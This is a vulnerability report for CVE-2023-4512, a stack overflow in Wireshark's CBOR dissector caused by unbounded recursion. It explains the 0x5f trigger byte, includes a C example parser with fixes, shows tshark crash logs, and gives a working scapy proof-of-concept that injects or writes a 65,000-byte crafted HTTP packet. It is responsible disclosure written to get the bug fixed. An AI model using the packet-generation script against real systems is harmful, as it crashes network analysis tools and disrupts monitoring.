Headline
CVE-2023-4512: CBOR dissector Uncontrolled Recursion leading to Stack-Overflow | DoS (#19144) · Issues · Wireshark Foundation / Wireshark · GitLab
CBOR dissector crash in Wireshark 4.0.0 to 4.0.6 allows denial of service via packet injection or crafted capture file
Summary
An Uncontrolled Recursion (CWE-674) in the CBOR dissector was found by Simone Di Maria in Wireshark 4.0.6. The vulnerability lies in the dissect_cbor_byte_string() function in epan/dissectors/packet-cbor.c, which lacks a recursion limit: a crafted indefinite-length byte string makes the function call itself once per input byte until the stack overflows, resulting in a Denial of Service via packet injection or a crafted capture file.
Technical details
The vulnerability is triggered when the parser encounters a CBOR (Concise Binary Object Representation) byte string element of indefinite length (packet-cbor.c:336). On reaching this element, the code enters a while loop that reads eof_type from the byte following the head byte of the CBOR object (offset+1).
If eof_type == 0xff the loop terminates; if (eof_type & 0xe0) >> 5 is not equal to CBOR_TYPE_BYTE_STRING (2), the function returns an error.
If eof_type passes both checks, the function calls itself recursively (packet-cbor.c:390).
Since type_minor is set to eof_type & 0x1f on the recursive call, a byte whose low five bits are 0x1f (indefinite length) passes the checks and the execution flow enters the while loop again, one stack frame deeper.
A byte that satisfies both conditions is 0x5f, whose binary representation is 01011111. Lining the masks up bitwise:
11100000 # \xe0
01011111 # \x5f
00011111 # \x1f
It is easy to see why that happens:
- 0x5f & 0xe0 gives 01000000 (0x40);
- right-shifting by 5 gives 00000010, which is 2 (CBOR_TYPE_BYTE_STRING), so the type check passes;
- 0x5f & 0x1f gives 00011111, which is again 0x1f (indefinite length), so the recursive call re-enters the while loop.
As a result, if the HTTP body consists of 65000 bytes of \x5f, the dissector recurses 65000 times, one level per byte, and never reaches a 0xff break code that would end the loop.
This uncontrolled recursion exhausts the stack and crashes Wireshark. An attacker can therefore trigger a denial-of-service condition by injecting such a packet or by supplying a crafted capture file.
To address this issue, the recursion has to be bounded: enforce a reasonable maximum nesting depth so that the loop always terminates before the stack is exhausted. A stricter check is also available, since RFC 8949 (section 3.2.3) requires the chunks of an indefinite-length string to have definite lengths, so a chunk whose own minor value is 0x1f can be rejected as malformed outright.
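The recursion described above, as an added example that is not Wireshark's code: a minimal C parser for CBOR byte strings written for this page. parse_bstr_body() mirrors the loop-and-recurse shape of dissect_cbor_byte_string() (the Wireshark function name and the CBOR_TYPE_BYTE_STRING constant are the report's; the other names, the cbor_limits knobs and the sample inputs are assumptions of the example), so a run of 0x5f bytes costs one stack frame per byte. The same function carries the two fixes a reviewer would ask for: a configurable depth cap, as the report recommends, and the stricter RFC 8949 rule that chunks of an indefinite-length string must themselves be definite-length, which removes the recursion altogether.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define CBOR_TYPE_BYTE_STRING 2
#define CBOR_BREAK            0xff   /* stop code ending an indefinite-length string */
#define CBOR_INDEFINITE       0x1f   /* additional-info value 31: indefinite length */

enum cbor_rc {
    CBOR_OK            =  0,
    CBOR_ERR_TRUNCATED = -1,   /* ran off the end of the buffer */
    CBOR_ERR_TYPE      = -2,   /* chunk is not a byte string, or reserved minor value */
    CBOR_ERR_DEPTH     = -3,   /* nesting exceeded the configured cap */
    CBOR_ERR_NESTED    = -4    /* strict mode: indefinite-length chunk inside a chunk list */
};

struct cbor_limits {          /* assumed knobs for this example, not Wireshark preferences */
    unsigned max_depth;       /* 0 = unbounded, i.e. the vulnerable behaviour */
    int      strict;          /* non-zero: chunks must be definite length (RFC 8949 3.2.3) */
};

/* Body of a byte string whose head byte is already consumed; type_minor is that byte's
 * low five bits. Indefinite length loops over chunks and recurses into each one. */
static int parse_bstr_body(const uint8_t *buf, size_t len, size_t *off,
                           unsigned type_minor, unsigned depth,
                           const struct cbor_limits *lim)
{
    if (lim->max_depth && depth > lim->max_depth) return CBOR_ERR_DEPTH;   /* fix 1: depth cap */

    if (type_minor == CBOR_INDEFINITE) {
        for (;;) {
            if (*off >= len) return CBOR_ERR_TRUNCATED;
            uint8_t eof_type = buf[(*off)++];
            if (eof_type == CBOR_BREAK) return CBOR_OK;
            if (((eof_type & 0xe0) >> 5) != CBOR_TYPE_BYTE_STRING) return CBOR_ERR_TYPE;
            unsigned chunk_minor = eof_type & 0x1f;
            /* 0x5f passes both checks with chunk_minor == 0x1f, so the recursive
             * call lands back in this loop one stack frame deeper. */
            if (lim->strict && chunk_minor == CBOR_INDEFINITE)
                return CBOR_ERR_NESTED;                 /* fix 2: reject nested indefinite */
            int rc = parse_bstr_body(buf, len, off, chunk_minor, depth + 1, lim);
            if (rc != CBOR_OK) return rc;
        }
    }

    /* Definite length: 0..23 inline, 24..27 = 1/2/4/8-byte big-endian length, 28..30 reserved. */
    uint64_t n = type_minor;
    if (type_minor >= 28) return CBOR_ERR_TYPE;
    if (type_minor >= 24) {
        size_t width = (size_t)1 << (type_minor - 24);
        if (len - *off < width) return CBOR_ERR_TRUNCATED;
        for (n = 0; width-- > 0; )
            n = (n << 8) | buf[(*off)++];
    }
    if (n > len - *off) return CBOR_ERR_TRUNCATED;
    *off += (size_t)n;
    return CBOR_OK;
}

/* Parse one top-level CBOR byte string; on CBOR_OK, *consumed is its encoded size. */
int cbor_parse_bstr(const uint8_t *buf, size_t len,
                    const struct cbor_limits *lim, size_t *consumed)
{
    if (len == 0) return CBOR_ERR_TRUNCATED;
    if (((buf[0] & 0xe0) >> 5) != CBOR_TYPE_BYTE_STRING) return CBOR_ERR_TYPE;
    size_t off = 1;
    int rc = parse_bstr_body(buf, len, &off, buf[0] & 0x1f, 1, lim);
    if (rc == CBOR_OK && consumed) *consumed = off;
    return rc;
}

/* Parse a constructed run of n 0x5f bytes: the report's payload, scaled down. */
int cbor_parse_run_of_5f(size_t n, const struct cbor_limits *lim)
{
    static uint8_t buf[65536];
    if (n > sizeof buf) n = sizeof buf;
    memset(buf, 0x5f, n);
    return cbor_parse_bstr(buf, n, lim, NULL);
}

int main(void)
{
    /* Constructed inputs, not taken from the report's pcap. */
    static const uint8_t good[] = { 0x5f, 0x42, 0x01, 0x02, 0x43, 0x03, 0x04, 0x05, 0xff };
    struct cbor_limits capped = { 64, 0 }, strict = { 0, 1 }, unbounded = { 0, 0 };
    size_t used = 0;
    printf("well-formed: rc=%d consumed=%zu\n", cbor_parse_bstr(good, sizeof good, &capped, &used), used);
    printf("0x5f x 4096, depth cap 64: rc=%d\n", cbor_parse_run_of_5f(4096, &capped));
    printf("0x5f x 4096, strict chunks: rc=%d\n", cbor_parse_run_of_5f(4096, &strict));
    /* Unbounded recurses once per byte and fails only at end of buffer; at the
     * report's 65000 bytes that is enough to exhaust a typical thread stack. */
    printf("0x5f x 4096, unbounded: rc=%d\n", cbor_parse_run_of_5f(4096, &unbounded));
    return 0;
}
```

The depth cap alone keeps the dissector's behaviour on valid input unchanged and only trades a crash for an error on pathological nesting; the strict check goes further and reports the report's payload as malformed at the very first chunk, because an indefinite-length chunk is never well-formed CBOR.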
Steps to reproduce
Open the provided pcap with Wireshark or Tshark: cbor_exploit.pcap.
NOTE: Whether the stack actually overflows depends on many factors, including the machine architecture, multi-threading, the amount of available memory, and the gui.max_tree_depth option set by the user in Preferences->Advanced.
What is certain is that the exploit consumes a lot of the target machine's resources if gui.max_tree_depth is set high; otherwise the program aborts with an Unhandled exception, as shown below.
PoC
High max_tree_depth
└─$ tshark -o 'gui.max_tree_depth:65000' -2 -nVxr cbor_exploit.pcap
Frame 1: 65152 bytes on wire (521216 bits), 65152 bytes captured (521216 bits)
[...]
[HTTP request 1/1]
File Data: 65000 bytes
Concise Binary Object Representation
Byte String: (indefinite length)
010. .... = Major Type: Byte String (2)
...1 1111 = Size: Indefinite Length (31)
Byte String (indefinite length)
Byte String: (indefinite length)
010. .... = Major Type: Byte String (2)
...1 1111 = Size: Indefinite Length (31)
Byte String (indefinite length)
Byte String: (indefinite length)
[...]
zsh: segmentation fault tshark -o 'gui.max_tree_depth:65000' -2 -nVxr cbor_exploit.pcap
Low max_tree_depth
└─$ tshark -o 'gui.max_tree_depth:3' -2 -nVxr cbor_packets.pcap
** (tshark:597282) 19:59:33.781692 [Epan WARNING] -- Dissector bug, protocol Ethernet, in packet 1: Maximum tree depth 3 exceeded for "Destination (resolved)" - "eth.dst_resolved" (proto_tree_add_node:5940) (Maximum depth can be increased in advanced preferences)
Unhandled exception ("Maximum tree depth 3 exceeded for "Dissector bug" - "_ws.malformed.dissector_bug" (proto_tree_add_node:5940) (Maximum depth can be increased in advanced preferences)", group=1, code=6)
zsh: IOT instruction tshark -o 'gui.max_tree_depth:3' -2 -nVxr cbor_packets.pcap
It also crashes in capture mode
└─$ tshark -i 'lo' -o 'gui.max_tree_depth:3' -nVx
Capturing on 'Loopback: lo'
** (tshark:598456) 20:01:34.964979 [Main MESSAGE] -- Capture started.
** (tshark:598456) 20:01:34.965027 [Main MESSAGE] -- File: "/tmp/wireshark_loWSRD61.pcapng"
Unhandled exception ("Maximum tree depth 3 exceeded for "Interface name" - "frame.interface_name" (proto_tree_add_node:5940) (Maximum depth can be increased in advanced preferences)", group=1, code=6)
zsh: IOT instruction tshark -i 'lo' -o 'gui.max_tree_depth:3' -nVx
Python script to generate the exploit:
from scapy.all import IP, TCP, Raw, send, wrpcap

MAX_PKT_LEN = 65000       # size of the CBOR body: one 0x5f byte per recursion level
NUM_PACKETS = 1
BASE_SRC_PORT = 10000

# 0x5f = major type 2 (byte string) with minor value 31 (indefinite length);
# a run of them passes the dissector's checks and never reaches a 0xff break code.
payload = b'\x5f' * MAX_PKT_LEN

packets = []
src_port = BASE_SRC_PORT
for _ in range(NUM_PACKETS):
    # HTTP POST with a CBOR content type, so the HTTP dissector hands the body to packet-cbor.c
    http_request = (
        "POST / HTTP/1.1\r\n"
        f"Content-Length: {MAX_PKT_LEN}\r\n"
        "Content-Type: application/cbor\r\n"
        "Host: example.com\r\n"
        "User-Agent: scapy\r\n"
        "\r\n"
    ).encode() + payload
    pkt = IP(src="127.0.0.1", dst="127.0.0.1") / TCP(sport=src_port, dport=80, flags="PA") / Raw(load=http_request)
    packets.append(pkt)
    src_port += 1

# Uncomment wrpcap() for the crafted-capture-file case; send() covers the packet-injection case.
#wrpcap("cbor_exploit.pcap", packets)
send(packets)
Build information
└─$ tshark -v
TShark (Wireshark) 4.0.6 (Git v4.0.6 packaged as 4.0.6-1~exp1).
Copyright 1998-2023 Gerald Combs <[email protected]> and contributors.
Licensed under the terms of the GNU General Public License (version 2 or later).
This is free software; see the file named COPYING in the distribution. There is
NO WARRANTY; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) using GCC 12.2.0, with GLib 2.74.6, with PCRE2, with zlib
1.2.13, with libpcap, with POSIX capabilities (Linux), with libnl 3, with Lua
5.2.4, with GnuTLS 3.7.9 and PKCS #11 support, with Gcrypt 1.10.1, with Kerberos
(MIT), with MaxMind, with nghttp2 1.53.0, with brotli, with LZ4, with Zstandard,
with Snappy, with libxml2 2.9.14, with libsmi 0.4.8, with binary plugins.
Running on Linux 5.18.0-kali7-amd64, with 11th Gen Intel(R) Core(TM) i5-1135G7 @
2.40GHz (with SSE4.2), with 15791 MB of physical memory, with GLib 2.74.6, with
PCRE2 10.40 2022-04-14, with zlib 1.2.11, with libpcap 1.10.1 (with TPACKET_V3),
with c-ares 1.18.1, with GnuTLS 3.7.7, with Gcrypt 1.10.1, with nghttp2 1.52.0,
with brotli 1.0.9, with LZ4 1.9.4, with Zstandard 1.5.4, with libsmi 0.4.8, with
LC_TYPE=it_IT.UTF-8, binary plugins supported.
For a more detailed understanding of this vulnerability, I’ve attached the ASAN.txt Output.
I’d also like to request a CVE ID for this vulnerability.
This vulnerability is similar to CVE-2013-3562, CVE-2017-9346, CVE-2017-9766, CVE-2018-9262 and CVE-2021-39929.
Please let me know if you need any additional information or assistance in addressing this vulnerability.
Regards,
Simone
Related news
Uncontrolled Recursion in the Bluetooth DHT dissector in Wireshark 3.4.0 to 3.4.9 and 3.2.0 to 3.2.17 allows denial of service via packet injection or crafted capture file